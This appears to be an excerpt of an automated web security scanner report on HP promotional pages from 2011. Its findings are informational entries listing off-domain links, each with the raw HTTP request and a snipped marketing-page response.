http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11458/
http://www.wildtangent.com/console?dp=hplaptop&mc=hplaptop_pcos_leftnav_jan2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_now__10731/
http://www.xobni.com/learnmore/index_hp?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-save_time_9937/
http://www1.snapfish.com/welcomenpnu

Request

GET /price_cat_rss/index.php?cc=us&ll=en&segment=slot23 HTTP/1.1
Host: h41112.www4.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 11:50:15 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8d
Last-Modified: Thu, 30 Jun 2011 08:00:15 GMT
Connection: close
Content-Type: text/html
Content-Length: 126978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">
<head>

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/js/hpweb_soctag.js"></script>
...[SNIP]...
<li>
<a class="hho" href="http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709" name="us_en_home_hho-product_l14_hho_fixed_photo-printing-services" onclick="try{trackMetrics('linkClick',{type:'link', id:this.getAttribute('name')});} catch(err) {}" tabindex="2">Photo Printing Services</a>
...[SNIP]...
<li>
<a class="hho" href="http://www1.snapfish.com/welcomenpnu" name="us_en_home_hho-at-home_l3_hho_fixed_share-and-print-photos-online" onclick="try{trackMetrics('linkClick',{type:'link', id:this.getAttribute('name')});} catch(err) {}" tabindex="3">Share & print photos online</a>
...[SNIP]...
<div class="arrow-blue png"><a href="http://hp.wildgames.com/console?dp=hpdesktop&mc=hpdesktop_pcos_leftnav_dec2010&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_now__9359/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Gms : Play Now! Download the HP Games Console'; sendAnalyticsEvent('',s_pageName);" class="article-category png" target="_blank">Play Now! Download the HP Games Console</a>
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/shrekforeverafter?dp=hpdesktop&mc=hp_consumerna_shrekforeverafter_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-shrek_fore_11813/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Shrek Forever After'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/shrekforeverafter?dp=hpdesktop&mc=hp_consumerna_shrekforeverafter_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-shrek_fore_11813/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Shrek Forever After'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/console?dp=hplaptop&mc=hplaptop_pcos_leftnav_jan2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_now__10731/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Play Now!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/console?dp=hplaptop&mc=hplaptop_pcos_leftnav_jan2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_now__10731/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Play Now!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.xobni.com/learnmore/index_hp?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-save_time_9937/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Software : Save Time Managing Email & Contacts'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.xobni.com/learnmore/index_hp?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-save_time_9937/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Software : Save Time Managing Email & Contacts'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11391/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : PC Health : What is spam? What is phishing?'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11391/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : PC Health : What is spam? What is phishing?'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.huddle.com/hp?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-manage_pro_10345/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Connect & Collaborate : Manage Projects, Files and People Online with Huddle'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.huddle.com/hp?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-manage_pro_10345/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Connect & Collaborate : Manage Projects, Files and People Online with Huddle'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11458/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play all your favorite games 3 different ways!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11458/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play all your favorite games 3 different ways!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.kobobooks.com/hp?utm_source=hp&utm_medium=partner&utm_campaign=hp&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-cheap_read_11245/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Cheap reads for your PC and more!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.kobobooks.com/hp?utm_source=hp&utm_medium=partner&utm_campaign=hp&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-cheap_read_11245/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Cheap reads for your PC and more!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://us.yola.com/hp/silver20PCOffers_feb/en_US?hardware=promotion&promo=HP_silver20PCOffers_FEB&reqloc=en_US&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-20_off_yo_9934/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Connect & Collaborate : 20% Off Your New Website'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://us.yola.com/hp/silver20PCOffers_feb/en_US?hardware=promotion&promo=HP_silver20PCOffers_FEB&reqloc=en_US&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-20_off_yo_9934/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Connect & Collaborate : 20% Off Your New Website'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.nutsie.com/top100sradio/Top%20100%20Songs%20For%20Summer/13659081?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-top_100_so_9947/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Top 100 Songs for Summer'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.nutsie.com/top100sradio/Top%20100%20Songs%20For%20Summer/13659081?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-top_100_so_9947/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Top 100 Songs for Summer'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.quickbooksdirect.com/psg5?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-save_time_10334/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Software : Save Time - Try QuickBooks Online'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.quickbooksdirect.com/psg5?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-save_time_10334/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Software : Save Time - Try QuickBooks Online'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11385/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Security : What is spam? What is phishing?'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11385/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Security : What is spam? What is phishing?'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://direct.digitallanding.com/default.aspx?PromoID=5001085&option1=pcos&option2=bus1&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-comcast_xf_10733/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Connect & Collaborate : Comcast Xfinity Bundle'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://direct.digitallanding.com/default.aspx?PromoID=5001085&option1=pcos&option2=bus1&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-comcast_xf_10733/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Connect & Collaborate : Comcast Xfinity Bundle'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://hp.barnesandnoble.com/psgweb?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-read_what_10717/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Read what you love. Anywhere you like.'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://hp.barnesandnoble.com/psgweb?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-read_what_10717/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Read what you love. Anywhere you like.'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://hp.blio.com?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-summer_rea_10730/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Summer Reading for Kids'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://hp.blio.com?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-summer_rea_10730/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Summer Reading for Kids'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.snapfish.com/hp_psg_freeship_2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-free_shipp_11242/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Free Shipping on Photobooks'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.snapfish.com/hp_psg_freeship_2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-free_shipp_11242/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Entertainment : Free Shipping on Photobooks'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.norton.com/buportal/hppcos/dt?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-try_norton_11392/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : PC Health : Try Norton Online Backup free for 30 days!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.norton.com/buportal/hppcos/dt?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-try_norton_11392/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : PC Health : Try Norton Online Backup free for 30 days!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.az" name="us_en_home_country-selector_l4_corp_fixed_azerbaijan" tabindex="180" title="Az..rbaycan">Az..rbaycan</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.is" name="us_en_home_country-selector_l19_corp_fixed_iceland" tabindex="180" title="Iceland">Iceland</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.ma" name="us_en_home_country-selector_l34_corp_fixed_morocco" tabindex="180" title="Maroc">Maroc</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.md" name="us_en_home_country-selector_l37_corp_fixed_moldova" tabindex="180" title="Moldova">Moldova</a>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/metricsNAhhomktg.js"></script>
...[SNIP]...

9.12. http://h41112.www4.hp.com/price_cat_rss/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h41112.www4.hp.com
Path:	/price_cat_rss/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://h41112.www4.hp.com/price_cat_rss/index.php?cc=us&ll=en&segment=slot23&showcat=Security

The response contains the following links to other domains:

http://direct.digitallanding.com/default.aspx?PromoID=5001085&option1=pcos&option2=bus1&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-get_a_250_11422/
http://welcome.hp-ww.com/country/us/en/js/metricsNAhhomktg.js
http://welcome.hp-ww.com/js/hpweb_soctag.js
http://www.hp.az/
http://www.hp.is/
http://www.hp.ma/
http://www.hp.md/
http://www.norton.com/buportal/hppcos/dt?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-try_norton_11389/
http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11385/
http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709
http://www1.snapfish.com/welcomenpnu

Request

GET /price_cat_rss/index.php?cc=us&ll=en&segment=slot23&showcat=Security HTTP/1.1
Host: h41112.www4.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 11:46:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8d
Last-Modified: Thu, 30 Jun 2011 08:00:15 GMT
Content-Type: text/html
Content-Length: 96808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">
<head>

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/js/hpweb_soctag.js"></script>
...[SNIP]...
<li>
<a class="hho" href="http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709" name="us_en_home_hho-product_l14_hho_fixed_photo-printing-services" onclick="try{trackMetrics('linkClick',{type:'link', id:this.getAttribute('name')});} catch(err) {}" tabindex="2">Photo Printing Services</a>
...[SNIP]...
<li>
<a class="hho" href="http://www1.snapfish.com/welcomenpnu" name="us_en_home_hho-at-home_l3_hho_fixed_share-and-print-photos-online" onclick="try{trackMetrics('linkClick',{type:'link', id:this.getAttribute('name')});} catch(err) {}" tabindex="3">Share & print photos online</a>
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11385/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Security : What is spam? What is phishing?'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11385/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Security : What is spam? What is phishing?'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.norton.com/buportal/hppcos/dt?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-try_norton_11389/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Security : Try Norton Online Backup free for 30 days!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.norton.com/buportal/hppcos/dt?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-try_norton_11389/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Security : Try Norton Online Backup free for 30 days!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://direct.digitallanding.com/default.aspx?PromoID=5001085&option1=pcos&option2=bus1&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-get_a_250_11422/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Security : Get a $250 Amazon Gift Card'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://direct.digitallanding.com/default.aspx?PromoID=5001085&option1=pcos&option2=bus1&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-get_a_250_11422/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Security : Get a $250 Amazon Gift Card'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.az" name="us_en_home_country-selector_l4_corp_fixed_azerbaijan" tabindex="180" title="Az..rbaycan">Az..rbaycan</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.is" name="us_en_home_country-selector_l19_corp_fixed_iceland" tabindex="180" title="Iceland">Iceland</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.ma" name="us_en_home_country-selector_l34_corp_fixed_morocco" tabindex="180" title="Maroc">Maroc</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.md" name="us_en_home_country-selector_l37_corp_fixed_moldova" tabindex="180" title="Moldova">Moldova</a>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/metricsNAhhomktg.js"></script>
...[SNIP]...

9.13. http://h41112.www4.hp.com/promo/webos/us/en/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h41112.www4.hp.com
Path:	/promo/webos/us/en/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://h41112.www4.hp.com/promo/webos/us/en/index.html?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_tablet

The response contains the following links to other domains:

http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&SiteID=hpproserv&SiteName=HP Products & Services&SkinName=hpscaleshare&ChannelID=73b38ee214e1d379cb19e7596c4fdf9f61a4fe98&StoryID=df11d111a7f7bdf05f89048a46d67ea54ab91ac2&AutoPlay=true&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=df11d111a7f7bdf05f89048a46d67ea54ab91ac2&rf=bm&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=df11d111a7f7bdf05f89048a46d67ea54ab91ac2&rf=bm
http://s7.addthis.com/js/250/addthis_widget.js
http://welcome.hp-ww.com/cma/region/na/metricsHHOstore.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4cca2f1844d48f49
http://www.facebook.com/HP
http://www.facebook.com/help/?page=1068
http://www.hp.az/
http://www.hp.is/
http://www.hp.ma/
http://www.hp.md/
http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709
http://www.twitter.com/hpnews
http://www1.snapfish.com/welcomenpnu

Request

GET /promo/webos/us/en/index.html?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_tablet HTTP/1.1
Host: h41112.www4.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.14. http://h41112.www4.hp.com/promo/webos/us/en/tablets/touchpad.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h41112.www4.hp.com
Path:	/promo/webos/us/en/tablets/touchpad.html

Issue detail

The page was loaded from a URL containing a query string:

http://h41112.www4.hp.com/promo/webos/us/en/tablets/touchpad.html?jumpid=in_r33_us/en/ps/psg/touchpad/r3b/hphome

The response contains the following links to other domains:

http://fast.fonts.com/cssapi/ac48bf67-1e0e-4bc3-a68d-f6c80cb28884.css
http://gem.compaq.com/gemstore/sites/public_sector/Touchpad/index.asp
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/r07/widget58.css
http://twitter.com/
http://welcome.hp-ww.com/country/us/en/js/metricsNAhhomktg.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4cca2f1844d48f49
http://www.amazon.com/hptouchpad
http://www.bestbuy.com/site/Computers-Promotions/HP+Touchpad+Highlights/pcmcat241300050028.c?id=pcmcat241300050028
http://www.cdw.com/hptouchpad
http://www.costco.com/Browse/Product.aspx?Prodid=11657930
http://www.facebook.com/HP
http://www.facebook.com/help/?page=1068
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=false&width=460&action=like&font=verdana&colorscheme=dark&height=48&href=http://h41112.www4.hp.com/promo/webos/us/en/index.html?jumpid=ex_r10104_ww/en/hho/psg/us-hp-palm-launch-mu_chev/webos
http://www.hp.az/
http://www.hp.is/
http://www.hp.ma/
http://www.hp.md/
http://www.insight.com/touchpad
http://www.jr.com/promotion/hp.jsp?nMXID=39852&nVID=7240393
http://www.newegg.com/hptouchpad
http://www.nfm.com/Default.aspx?N=1114%204294967248&NE=1070&Ntt=&nMXID=39849&nVID=7240393
http://www.officedepot.com/a/promo/pages/0426_hptablet/
http://www.pcconnection.com/IPA/Shop/Product/Search.htm?term=HP%20TouchPad&DefSort=Y&findin=allproducts&SearchType=1
http://www.pcmall.com/n/Overview/customPages-1950
http://www.pcrichard.com/custserv/content.jsp?pageName=HP&nmxid=39851&nVID=7240393
http://www.samsclub.com/hptouchpad
http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709
http://www.staples.com/cat_SH40_SH40?nMXID=39703&nVID=7240393
http://www.tigerdirect.com/sectors/campaigns/include/hp_touchPad.asp?srkey=HP%20Touchpad
http://www.walmart.com/cp/1074084?nmxid=39704&nvid=7240393
http://www.zones.com/hptouchpad
http://www1.snapfish.com/welcomenpnu

Request

GET /promo/webos/us/en/tablets/touchpad.html?jumpid=in_r33_us/en/ps/psg/touchpad/r3b/hphome HTTP/1.1
Host: h41112.www4.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 11:50:16 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8d
Connection: close
Content-Type: text/html
Content-Length: 108990

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="us-en" xml:lang
...[SNIP]...
<head>
<link rel="stylesheet" type="text/css" href="//s7.addthis.com/static/r07/widget58.css" media="all">
<script language="javascript">
...[SNIP]...
<![endif]-->
<link href="http://fast.fonts.com/cssapi/ac48bf67-1e0e-4bc3-a68d-f6c80cb28884.css" rel="stylesheet" type="text/css" />
<link href="../styles/touchpad.css" media="screen" rel="stylesheet" type="text/css"/>
...[SNIP]...
<li>
<a class="hho link_metrics" href="http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709" name="us_en_home_hho-product_l12_hho_fixed_photo-printing-services" tabindex="2" title="Photo Printing Services">Photo Printing Services</a>
...[SNIP]...
<li>
<a class="hho link_metrics" href="http://www1.snapfish.com/welcomenpnu" name="us_en_home_hho-at-home_l3_hho_fixed_share-print-photos-online" tabindex="3" title="Share & print photos online">Share & print photos online</a>
...[SNIP]...
<div class="community_social_text">
